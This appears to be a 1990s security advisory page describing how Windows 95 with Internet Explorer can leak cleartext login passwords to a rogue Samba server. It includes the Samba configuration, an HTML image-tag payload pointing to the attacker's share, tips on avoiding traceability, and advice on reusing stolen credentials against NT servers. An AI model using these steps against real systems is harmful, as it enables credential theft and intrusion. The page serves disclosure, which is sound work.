Windows 95 and MSIE Security Hole

What's new

It is possible from anywhere on the Internet to obtain the cleartext Windows 95 login password from a Windows 95 computer on a network connected directly to the Internet given only the IP address and the workgroup and leave no trace of your actions. It is untested and may work with Windows For Workgroups as well.

A demonstration is now available.

Description

There has been recent discussion on security mailing lists concerning the fact that Microsoft Internet Explorer running on Windows NT will automatically try to log in to a remote SMB server (file server) without prompting the user or without the user's knowledge. By design, the NT machine will transmit to this remote server the encrypted password and username of the user. This is documented by Aaron Spangler. The caveats with this are that the passwords are encrypted and that in many cases people do not use WWW browsers from NT servers, but rather from computers running Windows 95.

It has been explained that this same exploit does not work against Windows 95 because Windows 95 is only capable of accessing SMB shares (file sharing) if they are:

It is this third and final condition that can be taken advantage of to obtain the cleartext password and username of any Windows 95 user who uses Microsoft Internet Explorer. Even careless use of Microsoft Network Neighborhood can exploit this hole without the requirement for Internet Explorer The requirements are knowledge of the user's IP address, workgroup name and that they access a hostile web page. The first two are not difficult to obtain and the third does not have to be an obscure page. In the last 6 months sites such as the CIA have been broken into. All it would require is that one un-noticeable line be added to the home page. Since the viewable content of the page has not been altered, such a change can go unnoticed for a long time.

The Exploit

This involves the use of the Unix SMB implementation called Samba. There are no source changes required, but it should be compiled with -DDEBUG_PASSWORD.
Samba has an option in the smb.cfg file called remote announce. This allows you to specify a network address (host or broadcast) and workgroup name to inform about your existence. I have configured the [global] section of the smb.conf file like this:

   workgroup = EXPLOIT
   preferred master = yes
   domain master = yes
   security = user
   debug level = 100
   remote announce = 10.0.0.255/WORKGROUP
      

The only thing that must be changed is the remote announce line. The rest works as-is. A simple share must then be set up such as:

[exploit]
   path = /tmp
   public = no
   browsable = yes
      

Nothing needs to be in the directory as nobody will ever see it. For the sake of untractability, change your hostname to something that does not exist, but ensure to create an entry for it in /etc/hosts. This makes your host untraceable unless the network you are connecting to monitors network traffic.

Run smbd. If you are running it from inetd, the process must at least start itself in order to send the broadcast. Using smbclient to browse yourself is enough for this. The broadcast gets sent regardless of what smbd was started for.

At this point if anyone on the target network were to look at their Windows 95 Network Neighborhood they would see the host "EXPLOIT". The host is now vulnerable to your attack. While this step may seem a bit obscure and complicated, the truth is that it is very simple. I won't get into details here, but the methods for obtaining the workgroup name are easy to use and readily available. Finding a target network that has not protected ports 137 and 139 is also not so hard. Once you've done that, setting everything up to here takes a very short ammount of time.

The final and easiest step is to include the following in any html file a user on this network accesses:
<img src=file://\\exploit/exploit/t.gif>

Congratulations!!! You will now see in your Samba log a line such as this:
checking user=[user] pass=[INNOCENT]

What does this all mean?

The password of any Internet-connected user running Microsoft Internet Explorer on Windows 95 obtained be found in cleartext provided that their network administrator has not protected them from accessing external SMB servers by closing ports 139 and 137. If you have obtained the password of a user of a Windows NT server, you can now take the username, password and workgroup and log into that Windows NT server. Your true hostname and IP address are not stored in the html file and I am aware of no logging of hosts that enter the browse list. This means that you are not traceable, even though they are connecting to your machine. If you are lucky, you found the Windows 95 machine of the NT administrator and have little work left in order to access the NT server with administrator privileges.

Solutions

Demonstration

The demonstration is now available. In order to view the demonstration you should be using a Windows 95 computer to which we are able to connect to ports 137-139. If you are behind a firewall or other security device, then this will not work.

When you are ready, proceed to the demonstration.

Responses / Updates

Related Pages

Credits

Discovery by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.

Thanks also to hobbit for his paper on CIFS, BioH for helping to test this, and anyone else who helped or provided ideas.

Disclaimer

The details of this exploit are being released with the interest of security in mind. No malice or harm is intended towards any company or organization. We are not responsible for any actions taken based on this information, harmful or otherwise.
webmaster@security.org.il
Last modified: Sun Apr 13 13:54:11 IDT